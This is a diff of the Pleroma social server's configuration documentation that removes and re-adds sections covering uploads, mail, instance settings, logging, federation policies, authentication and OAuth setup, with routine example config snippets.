-config :logger,
- backends: [ {ExSyslogger, :ex_syslogger}, Quack.Logger ],
- level: :info
-
-config :logger, :ex_syslogger,
- level: :info,
- ident: "pleroma",
- format: "$metadata[$level] $message"
-
-config :quack,
- level: :warn,
- meta: [:all],
- webhook_url: "https://hooks.slack.com/services/YOUR-API-KEY-HERE"
-```
-
-See the [Quack Github](https://github.com/azohra/quack) for more details
-
-## :frontend_configurations
-
-This can be used to configure a keyword list that keeps the configuration data for any kind of frontend. By default, settings for `pleroma_fe` and `masto_fe` are configured.
-
-Frontends can access these settings at `/api/pleroma/frontend_configurations`
-
-To add your own configuration for PleromaFE, use it like this:
-
-```elixir
-config :pleroma, :frontend_configurations,
- pleroma_fe: %{
- theme: "pleroma-dark",
- # ... see /priv/static/static/config.json for the available keys.
-},
- masto_fe: %{
- showInstanceSpecificPanel: true
- }
-```
-
-These settings **need to be complete**, they will override the defaults.
-
-NOTE: for versions < 1.0, you need to set [`:fe`](#fe) to false, as shown a few lines below.
-
-## :fe
-__THIS IS DEPRECATED__
-
-If you are using this method, please change it to the [`frontend_configurations`](#frontend_configurations) method.
-Please **set this option to false** in your config like this:
-
-```elixir
-config :pleroma, :fe, false
-```
-
-This section is used to configure Pleroma-FE, unless ``:managed_config`` in ``:instance`` is set to false.
-
-* `theme`: Which theme to use, they are defined in ``styles.json``
-* `logo`: URL of the logo, defaults to Pleroma’s logo
-* `logo_mask`: Whether to use only the logo's shape as a mask (true) or as a regular image (false)
-* `logo_margin`: What margin to use around the logo
-* `background`: URL of the background, unless viewing a user profile with a background that is set
-* `redirect_root_no_login`: relative URL which indicates where to redirect when a user isn’t logged in.
-* `redirect_root_login`: relative URL which indicates where to redirect when a user is logged in.
-* `show_instance_panel`: Whenether to show the instance’s specific panel.
-* `scope_options_enabled`: Enable setting an notice visibility and subject/CW when posting
-* `formatting_options_enabled`: Enable setting a formatting different than plain-text (ie. HTML, Markdown) when posting, relates to ``:instance, allowed_post_formats``
-* `collapse_message_with_subjects`: When a message has a subject(aka Content Warning), collapse it by default
-* `hide_post_stats`: Hide notices statistics(repeats, favorites, …)
-* `hide_user_stats`: Hide profile statistics(posts, posts per day, followers, followings, …)
-
-## :assets
-
-This section configures assets to be used with various frontends. Currently the only option
-relates to mascots on the mastodon frontend
-
-* `mascots`: KeywordList of mascots, each element __MUST__ contain both a `url` and a
- `mime_type` key.
-* `default_mascot`: An element from `mascots` - This will be used as the default mascot
- on MastoFE (default: `:pleroma_fox_tan`)
-
-## :mrf_simple
-* `media_removal`: List of instances to remove medias from
-* `media_nsfw`: List of instances to put medias as NSFW(sensitive) from
-* `federated_timeline_removal`: List of instances to remove from Federated (aka The Whole Known Network) Timeline
-* `reject`: List of instances to reject any activities from
-* `accept`: List of instances to accept any activities from
-* `report_removal`: List of instances to reject reports from
-* `avatar_removal`: List of instances to strip avatars from
-* `banner_removal`: List of instances to strip banners from
-
-## :mrf_subchain
-This policy processes messages through an alternate pipeline when a given message matches certain criteria.
-All criteria are configured as a map of regular expressions to lists of policy modules.
-
-* `match_actor`: Matches a series of regular expressions against the actor field.
-
-Example:
-
-```
-config :pleroma, :mrf_subchain,
- match_actor: %{
- ~r/https:\/\/example.com/s => [Pleroma.Web.ActivityPub.MRF.DropPolicy]
- }
-```
-
-## :mrf_rejectnonpublic
-* `allow_followersonly`: whether to allow followers-only posts
-* `allow_direct`: whether to allow direct messages
-
-## :mrf_hellthread
-* `delist_threshold`: Number of mentioned users after which the message gets delisted (the message can still be seen, but it will not show up in public timelines and mentioned users won't get notifications about it). Set to 0 to disable.
-* `reject_threshold`: Number of mentioned users after which the messaged gets rejected. Set to 0 to disable.
-
-## :mrf_keyword
-* `reject`: A list of patterns which result in message being rejected, each pattern can be a string or a [regular expression](https://hexdocs.pm/elixir/Regex.html)
-* `federated_timeline_removal`: A list of patterns which result in message being removed from federated timelines (a.k.a unlisted), each pattern can be a string or a [regular expression](https://hexdocs.pm/elixir/Regex.html)
-* `replace`: A list of tuples containing `{pattern, replacement}`, `pattern` can be a string or a [regular expression](https://hexdocs.pm/elixir/Regex.html)
-
-## :mrf_mention
-* `actors`: A list of actors, for which to drop any posts mentioning.
-
-## :mrf_vocabulary
-* `accept`: A list of ActivityStreams terms to accept. If empty, all supported messages are accepted.
-* `reject`: A list of ActivityStreams terms to reject. If empty, no messages are rejected.
-
-## :media_proxy
-* `enabled`: Enables proxying of remote media to the instance’s proxy
-* `base_url`: The base URL to access a user-uploaded file. Useful when you want to proxy the media files via another host/CDN fronts.
-* `proxy_opts`: All options defined in `Pleroma.ReverseProxy` documentation, defaults to `[max_body_length: (25*1_048_576)]`.
-* `whitelist`: List of domains to bypass the mediaproxy
-
-## :gopher
-* `enabled`: Enables the gopher interface
-* `ip`: IP address to bind to
-* `port`: Port to bind to
-* `dstport`: Port advertised in urls (optional, defaults to `port`)
-
-## Pleroma.Web.Endpoint
-`Phoenix` endpoint configuration, all configuration options can be viewed [here](https://hexdocs.pm/phoenix/Phoenix.Endpoint.html#module-dynamic-configuration), only common options are listed here
-* `http` - a list containing http protocol configuration, all configuration options can be viewed [here](https://hexdocs.pm/plug_cowboy/Plug.Cowboy.html#module-options), only common options are listed here. For deployment using docker, you need to set this to `[ip: {0,0,0,0}, port: 4000]` to make pleroma accessible from other containers (such as your nginx server).
- - `ip` - a tuple consisting of 4 integers
- - `port`
-* `url` - a list containing the configuration for generating urls, accepts
- - `host` - the host without the scheme and a post (e.g `example.com`, not `https://example.com:2020`)
- - `scheme` - e.g `http`, `https`
- - `port`
- - `path`
-* `extra_cookie_attrs` - a list of `Key=Value` strings to be added as non-standard cookie attributes. Defaults to `["SameSite=Lax"]`. See the [SameSite article](https://www.owasp.org/index.php/SameSite) on OWASP for more info.
-
-
-
-**Important note**: if you modify anything inside these lists, default `config.exs` values will be overwritten, which may result in breakage, to make sure this does not happen please copy the default value for the list from `config.exs` and modify/add only what you need
-
-Example:
-```elixir
-config :pleroma, Pleroma.Web.Endpoint,
- url: [host: "example.com", port: 2020, scheme: "https"],
- http: [
- # start copied from config.exs
- dispatch: [
- {:_,
- [
- {"/api/v1/streaming", Pleroma.Web.MastodonAPI.WebsocketHandler, []},
- {"/websocket", Phoenix.Endpoint.CowboyWebSocket,
- {Phoenix.Transports.WebSocket,
- {Pleroma.Web.Endpoint, Pleroma.Web.UserSocket, websocket_config}}},
- {:_, Phoenix.Endpoint.Cowboy2Handler, {Pleroma.Web.Endpoint, []}}
- ]}
- # end copied from config.exs
- ],
- port: 8080,
- ip: {127, 0, 0, 1}
- ]
-```
-
-This will make Pleroma listen on `127.0.0.1` port `8080` and generate urls starting with `https://example.com:2020`
-
-## :activitypub
-* ``unfollow_blocked``: Whether blocks result in people getting unfollowed
-* ``outgoing_blocks``: Whether to federate blocks to other instances
-* ``deny_follow_blocked``: Whether to disallow following an account that has blocked the user in question
-* ``sign_object_fetches``: Sign object fetches with HTTP signatures
-
-## :http_security
-* ``enabled``: Whether the managed content security policy is enabled
-* ``sts``: Whether to additionally send a `Strict-Transport-Security` header
-* ``sts_max_age``: The maximum age for the `Strict-Transport-Security` header if sent
-* ``ct_max_age``: The maximum age for the `Expect-CT` header if sent
-* ``referrer_policy``: The referrer policy to use, either `"same-origin"` or `"no-referrer"`
-* ``report_uri``: Adds the specified url to `report-uri` and `report-to` group in CSP header.
-
-## :mrf_user_allowlist
-
-The keys in this section are the domain names that the policy should apply to.
-Each key should be assigned a list of users that should be allowed through by
-their ActivityPub ID.
-
-An example:
-
-```elixir
-config :pleroma, :mrf_user_allowlist,
- "example.org": ["https://example.org/users/admin"]
-```
-
-## :web_push_encryption, :vapid_details
-
-Web Push Notifications configuration. You can use the mix task `mix web_push.gen.keypair` to generate it.
-
-* ``subject``: a mailto link for the administrative contact. It’s best if this email is not a personal email address, but rather a group email so that if a person leaves an organization, is unavailable for an extended period, or otherwise can’t respond, someone else on the list can.
-* ``public_key``: VAPID public key
-* ``private_key``: VAPID private key
-
-## Pleroma.Captcha
-* `enabled`: Whether the captcha should be shown on registration
-* `method`: The method/service to use for captcha
-* `seconds_valid`: The time in seconds for which the captcha is valid
-
-### Pleroma.Captcha.Kocaptcha
-Kocaptcha is a very simple captcha service with a single API endpoint,
-the source code is here: https://github.com/koto-bank/kocaptcha. The default endpoint
-`https://captcha.kotobank.ch` is hosted by the developer.
-
-* `endpoint`: the kocaptcha endpoint to use
-
-## :admin_token
-
-Allows to set a token that can be used to authenticate with the admin api without using an actual user by giving it as the 'admin_token' parameter. Example:
-
-```elixir
-config :pleroma, :admin_token, "somerandomtoken"
-```
-
-You can then do
-
-```sh
-curl "http://localhost:4000/api/pleroma/admin/invite_token?admin_token=somerandomtoken"
-```
-
-## :pleroma_job_queue
-
-[Pleroma Job Queue](https://git.pleroma.social/pleroma/pleroma_job_queue) configuration: a list of queues with maximum concurrent jobs.
-
-Pleroma has the following queues:
-
-* `federator_outgoing` - Outgoing federation
-* `federator_incoming` - Incoming federation
-* `mailer` - Email sender, see [`Pleroma.Emails.Mailer`](#pleroma-emails-mailer)
-* `transmogrifier` - Transmogrifier
-* `web_push` - Web push notifications
-* `scheduled_activities` - Scheduled activities, see [`Pleroma.ScheduledActivities`](#pleromascheduledactivity)
-
-Example:
-
-```elixir
-config :pleroma_job_queue, :queues,
- federator_incoming: 50,
- federator_outgoing: 50
-```
-
-This config contains two queues: `federator_incoming` and `federator_outgoing`. Both have the `max_jobs` set to `50`.
-
-## Pleroma.Web.Federator.RetryQueue
-
-* `enabled`: If set to `true`, failed federation jobs will be retried
-* `max_jobs`: The maximum amount of parallel federation jobs running at the same time.
-* `initial_timeout`: The initial timeout in seconds
-* `max_retries`: The maximum number of times a federation job is retried
-
-## Pleroma.Web.Metadata
-* `providers`: a list of metadata providers to enable. Providers available:
- * Pleroma.Web.Metadata.Providers.OpenGraph
- * Pleroma.Web.Metadata.Providers.TwitterCard
- * Pleroma.Web.Metadata.Providers.RelMe - add links from user bio with rel=me into the `` as ``
-* `unfurl_nsfw`: If set to `true` nsfw attachments will be shown in previews
-
-## :rich_media
-* `enabled`: if enabled the instance will parse metadata from attached links to generate link previews
-* `ignore_hosts`: list of hosts which will be ignored by the metadata parser. For example `["accounts.google.com", "xss.website"]`, defaults to `[]`.
-* `ignore_tld`: list TLDs (top-level domains) which will ignore for parse metadata. default is ["local", "localdomain", "lan"]
-* `parsers`: list of Rich Media parsers
-
-## :fetch_initial_posts
-* `enabled`: if enabled, when a new user is federated with, fetch some of their latest posts
-* `pages`: the amount of pages to fetch
-
-## :hackney_pools
-
-Advanced. Tweaks Hackney (http client) connections pools.
-
-There's three pools used:
-
-* `:federation` for the federation jobs.
- You may want this pool max_connections to be at least equal to the number of federator jobs + retry queue jobs.
-* `:media` for rich media, media proxy
-* `:upload` for uploaded media (if using a remote uploader and `proxy_remote: true`)
-
-For each pool, the options are:
-
-* `max_connections` - how much connections a pool can hold
-* `timeout` - retention duration for connections
-
-## :auto_linker
-
-Configuration for the `auto_linker` library:
-
-* `class: "auto-linker"` - specify the class to be added to the generated link. false to clear
-* `rel: "noopener noreferrer"` - override the rel attribute. false to clear
-* `new_window: true` - set to false to remove `target='_blank'` attribute
-* `scheme: false` - Set to true to link urls with schema `http://google.com`
-* `truncate: false` - Set to a number to truncate urls longer then the number. Truncated urls will end in `..`
-* `strip_prefix: true` - Strip the scheme prefix
-* `extra: false` - link urls with rarely used schemes (magnet, ipfs, irc, etc.)
-
-Example:
-
-```elixir
-config :auto_linker,
- opts: [
- scheme: true,
- extra: true,
- class: false,
- strip_prefix: false,
- new_window: false,
- rel: false
- ]
-```
-
-## Pleroma.ScheduledActivity
-
-* `daily_user_limit`: the number of scheduled activities a user is allowed to create in a single day (Default: `25`)
-* `total_user_limit`: the number of scheduled activities a user is allowed to create in total (Default: `300`)
-* `enabled`: whether scheduled activities are sent to the job queue to be executed
-
-## Pleroma.ActivityExpiration
-
-# `enabled`: whether expired activities will be sent to the job queue to be deleted
-
-## Pleroma.Web.Auth.Authenticator
-
-* `Pleroma.Web.Auth.PleromaAuthenticator`: default database authenticator
-* `Pleroma.Web.Auth.LDAPAuthenticator`: LDAP authentication
-
-## :ldap
-
-Use LDAP for user authentication. When a user logs in to the Pleroma
-instance, the name and password will be verified by trying to authenticate
-(bind) to an LDAP server. If a user exists in the LDAP directory but there
-is no account with the same name yet on the Pleroma instance then a new
-Pleroma account will be created with the same name as the LDAP user name.
-
-* `enabled`: enables LDAP authentication
-* `host`: LDAP server hostname
-* `port`: LDAP port, e.g. 389 or 636
-* `ssl`: true to use SSL, usually implies the port 636
-* `sslopts`: additional SSL options
-* `tls`: true to start TLS, usually implies the port 389
-* `tlsopts`: additional TLS options
-* `base`: LDAP base, e.g. "dc=example,dc=com"
-* `uid`: LDAP attribute name to authenticate the user, e.g. when "cn", the filter will be "cn=username,base"
-
-## BBS / SSH access
-
-To enable simple command line interface accessible over ssh, add a setting like this to your configuration file:
-
-```exs
-app_dir = File.cwd!
-priv_dir = Path.join([app_dir, "priv/ssh_keys"])
-
-config :esshd,
- enabled: true,
- priv_dir: priv_dir,
- handler: "Pleroma.BBS.Handler",
- port: 10_022,
- password_authenticator: "Pleroma.BBS.Authenticator"
-```
-
-Feel free to adjust the priv_dir and port number. Then you will have to create the key for the keys (in the example `priv/ssh_keys`) and create the host keys with `ssh-keygen -m PEM -N "" -b 2048 -t rsa -f ssh_host_rsa_key`. After restarting, you should be able to connect to your Pleroma instance with `ssh username@server -p $PORT`
-
-## :auth
-
-* `Pleroma.Web.Auth.PleromaAuthenticator`: default database authenticator
-* `Pleroma.Web.Auth.LDAPAuthenticator`: LDAP authentication
-
-Authentication / authorization settings.
-
-* `auth_template`: authentication form template. By default it's `show.html` which corresponds to `lib/pleroma/web/templates/o_auth/o_auth/show.html.eex`.
-* `oauth_consumer_template`: OAuth consumer mode authentication form template. By default it's `consumer.html` which corresponds to `lib/pleroma/web/templates/o_auth/o_auth/consumer.html.eex`.
-* `oauth_consumer_strategies`: the list of enabled OAuth consumer strategies; by default it's set by `OAUTH_CONSUMER_STRATEGIES` environment variable. Each entry in this space-delimited string should be of format `` or `:` (e.g. `twitter` or `keycloak:ueberauth_keycloak_strategy` in case dependency is named differently than `ueberauth_`).
-
-## :email_notifications
-
-Email notifications settings.
-
- - digest - emails of "what you've missed" for users who have been
- inactive for a while.
- - active: globally enable or disable digest emails
- - schedule: When to send digest email, in [crontab format](https://en.wikipedia.org/wiki/Cron).
- "0 0 * * 0" is the default, meaning "once a week at midnight on Sunday morning"
- - interval: Minimum interval between digest emails to one user
- - inactivity_threshold: Minimum user inactivity threshold
-
-## Pleroma.Emails.UserEmail
-
-- `:logo` - a path to a custom logo. Set it to `nil` to use the default Pleroma logo.
-- `:styling` - a map with color settings for email templates.
-
-## OAuth consumer mode
-
-OAuth consumer mode allows sign in / sign up via external OAuth providers (e.g. Twitter, Facebook, Google, Microsoft, etc.).
-Implementation is based on Ueberauth; see the list of [available strategies](https://github.com/ueberauth/ueberauth/wiki/List-of-Strategies).
-
-Note: each strategy is shipped as a separate dependency; in order to get the strategies, run `OAUTH_CONSUMER_STRATEGIES="..." mix deps.get`,
-e.g. `OAUTH_CONSUMER_STRATEGIES="twitter facebook google microsoft" mix deps.get`.
-The server should also be started with `OAUTH_CONSUMER_STRATEGIES="..." mix phx.server` in case you enable any strategies.
-
-Note: each strategy requires separate setup (on external provider side and Pleroma side). Below are the guidelines on setting up most popular strategies.
-
-Note: make sure that `"SameSite=Lax"` is set in `extra_cookie_attrs` when you have this feature enabled. OAuth consumer mode will not work with `"SameSite=Strict"`
-
-* For Twitter, [register an app](https://developer.twitter.com/en/apps), configure callback URL to https:///oauth/twitter/callback
-
-* For Facebook, [register an app](https://developers.facebook.com/apps), configure callback URL to https:///oauth/facebook/callback, enable Facebook Login service at https://developers.facebook.com/apps//fb-login/settings/
-
-* For Google, [register an app](https://console.developers.google.com), configure callback URL to https:///oauth/google/callback
-
-* For Microsoft, [register an app](https://portal.azure.com), configure callback URL to https:///oauth/microsoft/callback
-
-Once the app is configured on external OAuth provider side, add app's credentials and strategy-specific settings (if any — e.g. see Microsoft below) to `config/prod.secret.exs`,
-per strategy's documentation (e.g. [ueberauth_twitter](https://github.com/ueberauth/ueberauth_twitter)). Example config basing on environment variables:
-
-```elixir
-# Twitter
-config :ueberauth, Ueberauth.Strategy.Twitter.OAuth,
- consumer_key: System.get_env("TWITTER_CONSUMER_KEY"),
- consumer_secret: System.get_env("TWITTER_CONSUMER_SECRET")
-
-# Facebook
-config :ueberauth, Ueberauth.Strategy.Facebook.OAuth,
- client_id: System.get_env("FACEBOOK_APP_ID"),
- client_secret: System.get_env("FACEBOOK_APP_SECRET"),
- redirect_uri: System.get_env("FACEBOOK_REDIRECT_URI")
-
-# Google
-config :ueberauth, Ueberauth.Strategy.Google.OAuth,
- client_id: System.get_env("GOOGLE_CLIENT_ID"),
- client_secret: System.get_env("GOOGLE_CLIENT_SECRET"),
- redirect_uri: System.get_env("GOOGLE_REDIRECT_URI")
-
-# Microsoft
-config :ueberauth, Ueberauth.Strategy.Microsoft.OAuth,
- client_id: System.get_env("MICROSOFT_CLIENT_ID"),
- client_secret: System.get_env("MICROSOFT_CLIENT_SECRET")
-
-config :ueberauth, Ueberauth,
- providers: [
- microsoft: {Ueberauth.Strategy.Microsoft, [callback_params: []]}
- ]
-
-# Keycloak
-# Note: make sure to add `keycloak:ueberauth_keycloak_strategy` entry to `OAUTH_CONSUMER_STRATEGIES` environment variable
-keycloak_url = "https://publicly-reachable-keycloak-instance.org:8080"
-
-config :ueberauth, Ueberauth.Strategy.Keycloak.OAuth,
- client_id: System.get_env("KEYCLOAK_CLIENT_ID"),
- client_secret: System.get_env("KEYCLOAK_CLIENT_SECRET"),
- site: keycloak_url,
- authorize_url: "#{keycloak_url}/auth/realms/master/protocol/openid-connect/auth",
- token_url: "#{keycloak_url}/auth/realms/master/protocol/openid-connect/token",
- userinfo_url: "#{keycloak_url}/auth/realms/master/protocol/openid-connect/userinfo",
- token_method: :post
-
-config :ueberauth, Ueberauth,
- providers: [
- keycloak: {Ueberauth.Strategy.Keycloak, [uid_field: :email]}
- ]
-```
-
-## OAuth 2.0 provider - :oauth2
-
-Configure OAuth 2 provider capabilities:
-
-* `token_expires_in` - The lifetime in seconds of the access token.
-* `issue_new_refresh_token` - Keeps old refresh token or generate new refresh token when to obtain an access token.
-* `clean_expired_tokens` - Enable a background job to clean expired oauth tokens. Defaults to `false`.
-* `clean_expired_tokens_interval` - Interval to run the job to clean expired tokens. Defaults to `86_400_000` (24 hours).
-
-## :emoji
-* `shortcode_globs`: Location of custom emoji files. `*` can be used as a wildcard. Example `["/emoji/custom/**/*.png"]`
-* `pack_extensions`: A list of file extensions for emojis, when no emoji.txt for a pack is present. Example `[".png", ".gif"]`
-* `groups`: Emojis are ordered in groups (tags). This is an array of key-value pairs where the key is the groupname and the value the location or array of locations. `*` can be used as a wildcard. Example `[Custom: ["/emoji/*.png", "/emoji/custom/*.png"]]`
-* `default_manifest`: Location of the JSON-manifest. This manifest contains information about the emoji-packs you can download. Currently only one manifest can be added (no arrays).
-
-## Database options
-
-### RUM indexing for full text search
-* `rum_enabled`: If RUM indexes should be used. Defaults to `false`.
-
-RUM indexes are an alternative indexing scheme that is not included in PostgreSQL by default. While they may eventually be mainlined, for now they have to be installed as a PostgreSQL extension from https://github.com/postgrespro/rum.
-
-Their advantage over the standard GIN indexes is that they allow efficient ordering of search results by timestamp, which makes search queries a lot faster on larger servers, by one or two orders of magnitude. They take up around 3 times as much space as GIN indexes.
-
-To enable them, both the `rum_enabled` flag has to be set and the following special migration has to be run:
-
-`mix ecto.migrate --migrations-path priv/repo/optional_migrations/rum_indexing/`
-
-This will probably take a long time.
-
-## :rate_limit
-
-This is an advanced feature and disabled by default.
-
-A keyword list of rate limiters where a key is a limiter name and value is the limiter configuration. The basic configuration is a tuple where:
-
-* The first element: `scale` (Integer). The time scale in milliseconds.
-* The second element: `limit` (Integer). How many requests to limit in the time scale provided.
-
-It is also possible to have different limits for unauthenticated and authenticated users: the keyword value must be a list of two tuples where the first one is a config for unauthenticated users and the second one is for authenticated.
-
-See [`Pleroma.Plugs.RateLimiter`](Pleroma.Plugs.RateLimiter.html) documentation for examples.
-
-Supported rate limiters:
-
-* `:search` for the search requests (account & status search etc.)
-* `:app_account_creation` for registering user accounts from the same IP address
-* `:relations_actions` for actions on relations with all users (follow, unfollow)
-* `:relation_id_action` for actions on relation with a specific user (follow, unfollow)
-* `:statuses_actions` for create / delete / fav / unfav / reblog / unreblog actions on any statuses
-* `:status_id_action` for fav / unfav or reblog / unreblog actions on the same status by the same user
-
-## :web_cache_ttl
-
-The expiration time for the web responses cache. Values should be in milliseconds or `nil` to disable expiration.
-
-Available caches:
-
-* `:activity_pub` - activity pub routes (except question activities). Defaults to `nil` (no expiration).
-* `:activity_pub_question` - activity pub routes (question activities). Defaults to `30_000` (30 seconds).
+# Configuration
+
+This file describe the configuration, it is recommended to edit the relevant *.secret.exs file instead of the others founds in the ``config`` directory.
+If you run Pleroma with ``MIX_ENV=prod`` the file is ``prod.secret.exs``, otherwise it is ``dev.secret.exs``.
+
+## Pleroma.Upload
+* `uploader`: Select which `Pleroma.Uploaders` to use
+* `filters`: List of `Pleroma.Upload.Filter` to use.
+* `link_name`: When enabled Pleroma will add a `name` parameter to the url of the upload, for example `https://instance.tld/media/corndog.png?name=corndog.png`. This is needed to provide the correct filename in Content-Disposition headers when using filters like `Pleroma.Upload.Filter.Dedupe`
+* `base_url`: The base URL to access a user-uploaded file. Useful when you want to proxy the media files via another host.
+* `proxy_remote`: If you're using a remote uploader, Pleroma will proxy media requests instead of redirecting to it.
+* `proxy_opts`: Proxy options, see `Pleroma.ReverseProxy` documentation.
+
+Note: `strip_exif` has been replaced by `Pleroma.Upload.Filter.Mogrify`.
+
+## Pleroma.Uploaders.Local
+* `uploads`: Which directory to store the user-uploads in, relative to pleroma’s working directory
+
+## Pleroma.Uploaders.S3
+* `bucket`: S3 bucket name
+* `bucket_namespace`: S3 bucket namespace
+* `public_endpoint`: S3 endpoint that the user finally accesses(ex. "https://s3.dualstack.ap-northeast-1.amazonaws.com")
+* `truncated_namespace`: If you use S3 compatible service such as Digital Ocean Spaces or CDN, set folder name or "" etc.
+For example, when using CDN to S3 virtual host format, set "".
+At this time, write CNAME to CDN in public_endpoint.
+
+## Pleroma.Upload.Filter.Mogrify
+
+* `args`: List of actions for the `mogrify` command like `"strip"` or `["strip", "auto-orient", {"implode", "1"}]`.
+
+## Pleroma.Upload.Filter.Dedupe
+
+No specific configuration.
+
+## Pleroma.Upload.Filter.AnonymizeFilename
+
+This filter replaces the filename (not the path) of an upload. For complete obfuscation, add
+`Pleroma.Upload.Filter.Dedupe` before AnonymizeFilename.
+
+* `text`: Text to replace filenames in links. If empty, `{random}.extension` will be used. You can get the original filename extension by using `{extension}`, for example `custom-file-name.{extension}`.
+
+## Pleroma.Emails.Mailer
+* `adapter`: one of the mail adapters listed in [Swoosh readme](https://github.com/swoosh/swoosh#adapters), or `Swoosh.Adapters.Local` for in-memory mailbox.
+* `api_key` / `password` and / or other adapter-specific settings, per the above documentation.
+* `enabled`: Allows enable/disable send emails. Default: `false`.
+
+An example for Sendgrid adapter:
+
+```elixir
+config :pleroma, Pleroma.Emails.Mailer,
+ adapter: Swoosh.Adapters.Sendgrid,
+ api_key: "YOUR_API_KEY"
+```
+
+An example for SMTP adapter:
+
+```elixir
+config :pleroma, Pleroma.Emails.Mailer,
+ adapter: Swoosh.Adapters.SMTP,
+ relay: "smtp.gmail.com",
+ username: "YOUR_USERNAME@gmail.com",
+ password: "YOUR_SMTP_PASSWORD",
+ port: 465,
+ ssl: true,
+ tls: :always,
+ auth: :always
+```
+
+## :uri_schemes
+* `valid_schemes`: List of the scheme part that is considered valid to be an URL
+
+## :instance
+* `name`: The instance’s name
+* `email`: Email used to reach an Administrator/Moderator of the instance
+* `notify_email`: Email used for notifications.
+* `description`: The instance’s description, can be seen in nodeinfo and ``/api/v1/instance``
+* `limit`: Posts character limit (CW/Subject included in the counter)
+* `remote_limit`: Hard character limit beyond which remote posts will be dropped.
+* `upload_limit`: File size limit of uploads (except for avatar, background, banner)
+* `avatar_upload_limit`: File size limit of user’s profile avatars
+* `background_upload_limit`: File size limit of user’s profile backgrounds
+* `banner_upload_limit`: File size limit of user’s profile banners
+* `poll_limits`: A map with poll limits for **local** polls
+ * `max_options`: Maximum number of options
+ * `max_option_chars`: Maximum number of characters per option
+ * `min_expiration`: Minimum expiration time (in seconds)
+ * `max_expiration`: Maximum expiration time (in seconds)
+* `registrations_open`: Enable registrations for anyone, invitations can be enabled when false.
+* `invites_enabled`: Enable user invitations for admins (depends on `registrations_open: false`).
+* `account_activation_required`: Require users to confirm their emails before signing in.
+* `federating`: Enable federation with other instances
+* `federation_incoming_replies_max_depth`: Max. depth of reply-to activities fetching on incoming federation, to prevent out-of-memory situations while fetching very long threads. If set to `nil`, threads of any depth will be fetched. Lower this value if you experience out-of-memory crashes.
+* `federation_reachability_timeout_days`: Timeout (in days) of each external federation target being unreachable prior to pausing federating to it.
+* `allow_relay`: Enable Pleroma’s Relay, which makes it possible to follow a whole instance
+* `rewrite_policy`: Message Rewrite Policy, either one or a list. Here are the ones available by default:
+ * `Pleroma.Web.ActivityPub.MRF.NoOpPolicy`: Doesn’t modify activities (default)
+ * `Pleroma.Web.ActivityPub.MRF.DropPolicy`: Drops all activities. It generally doesn’t makes sense to use in production
+ * `Pleroma.Web.ActivityPub.MRF.SimplePolicy`: Restrict the visibility of activities from certains instances (See ``:mrf_simple`` section)
+ * `Pleroma.Web.ActivityPub.MRF.TagPolicy`: Applies policies to individual users based on tags, which can be set using pleroma-fe/admin-fe/any other app that supports Pleroma Admin API. For example it allows marking posts from individual users nsfw (sensitive)
+ * `Pleroma.Web.ActivityPub.MRF.SubchainPolicy`: Selectively runs other MRF policies when messages match (see ``:mrf_subchain`` section)
+ * `Pleroma.Web.ActivityPub.MRF.RejectNonPublic`: Drops posts with non-public visibility settings (See ``:mrf_rejectnonpublic`` section)
+ * `Pleroma.Web.ActivityPub.MRF.EnsureRePrepended`: Rewrites posts to ensure that replies to posts with subjects do not have an identical subject and instead begin with re:.
+ * `Pleroma.Web.ActivityPub.MRF.AntiLinkSpamPolicy`: Rejects posts from likely spambots by rejecting posts from new users that contain links.
+ * `Pleroma.Web.ActivityPub.MRF.MediaProxyWarmingPolicy`: Crawls attachments using their MediaProxy URLs so that the MediaProxy cache is primed.
+ * `Pleroma.Web.ActivityPub.MRF.MentionPolicy`: Drops posts mentioning configurable users. (see `:mrf_mention` section)
+ * `Pleroma.Web.ActivityPub.MRF.VocabularyPolicy`: Restricts activities to a configured set of vocabulary. (see `:mrf_vocabulary` section)
+* `public`: Makes the client API in authentificated mode-only except for user-profiles. Useful for disabling the Local Timeline and The Whole Known Network.
+* `quarantined_instances`: List of ActivityPub instances where private(DMs, followers-only) activities will not be send.
+* `managed_config`: Whenether the config for pleroma-fe is configured in this config or in ``static/config.json``
+* `allowed_post_formats`: MIME-type list of formats allowed to be posted (transformed into HTML)
+* `mrf_transparency`: Make the content of your Message Rewrite Facility settings public (via nodeinfo).
+* `mrf_transparency_exclusions`: Exclude specific instance names from MRF transparency. The use of the exclusions feature will be disclosed in nodeinfo as a boolean value.
+* `scope_copy`: Copy the scope (private/unlisted/public) in replies to posts by default.
+* `subject_line_behavior`: Allows changing the default behaviour of subject lines in replies. Valid values:
+ * "email": Copy and preprend re:, as in email.
+ * "masto": Copy verbatim, as in Mastodon.
+ * "noop": Don't copy the subject.
+* `always_show_subject_input`: When set to false, auto-hide the subject field when it's empty.
+* `extended_nickname_format`: Set to `true` to use extended local nicknames format (allows underscores/dashes). This will break federation with
+ older software for theses nicknames.
+* `max_pinned_statuses`: The maximum number of pinned statuses. `0` will disable the feature.
+* `autofollowed_nicknames`: Set to nicknames of (local) users that every new user should automatically follow.
+* `no_attachment_links`: Set to true to disable automatically adding attachment link text to statuses
+* `welcome_message`: A message that will be send to a newly registered users as a direct message.
+* `welcome_user_nickname`: The nickname of the local user that sends the welcome message.
+* `max_report_comment_size`: The maximum size of the report comment (Default: `1000`)
+* `safe_dm_mentions`: If set to true, only mentions at the beginning of a post will be used to address people in direct messages. This is to prevent accidental mentioning of people when talking about them (e.g. "@friend hey i really don't like @enemy"). Default: `false`.
+* `healthcheck`: If set to true, system data will be shown on ``/api/pleroma/healthcheck``.
+* `remote_post_retention_days`: The default amount of days to retain remote posts when pruning the database.
+* `user_bio_length`: A user bio maximum length (default: `5000`)
+* `user_name_length`: A user name maximum length (default: `100`)
+* `skip_thread_containment`: Skip filter out broken threads. The default is `false`.
+* `limit_to_local_content`: Limit unauthenticated users to search for local statutes and users only. Possible values: `:unauthenticated`, `:all` and `false`. The default is `:unauthenticated`.
+* `dynamic_configuration`: Allow transferring configuration to DB with the subsequent customization from Admin api.
+* `max_account_fields`: The maximum number of custom fields in the user profile (default: `10`)
+* `max_remote_account_fields`: The maximum number of custom fields in the remote user profile (default: `20`)
+* `account_field_name_length`: An account field name maximum length (default: `512`)
+* `account_field_value_length`: An account field value maximum length (default: `512`)
+* `external_user_synchronization`: Enabling following/followers counters synchronization for external users.
+
+
+
+## :logger
+* `backends`: `:console` is used to send logs to stdout, `{ExSyslogger, :ex_syslogger}` to log to syslog, and `Quack.Logger` to log to Slack
+
+An example to enable ONLY ExSyslogger (f/ex in ``prod.secret.exs``) with info and debug suppressed:
+```elixir
+config :logger,
+ backends: [{ExSyslogger, :ex_syslogger}]
+
+config :logger, :ex_syslogger,
+ level: :warn
+```
+
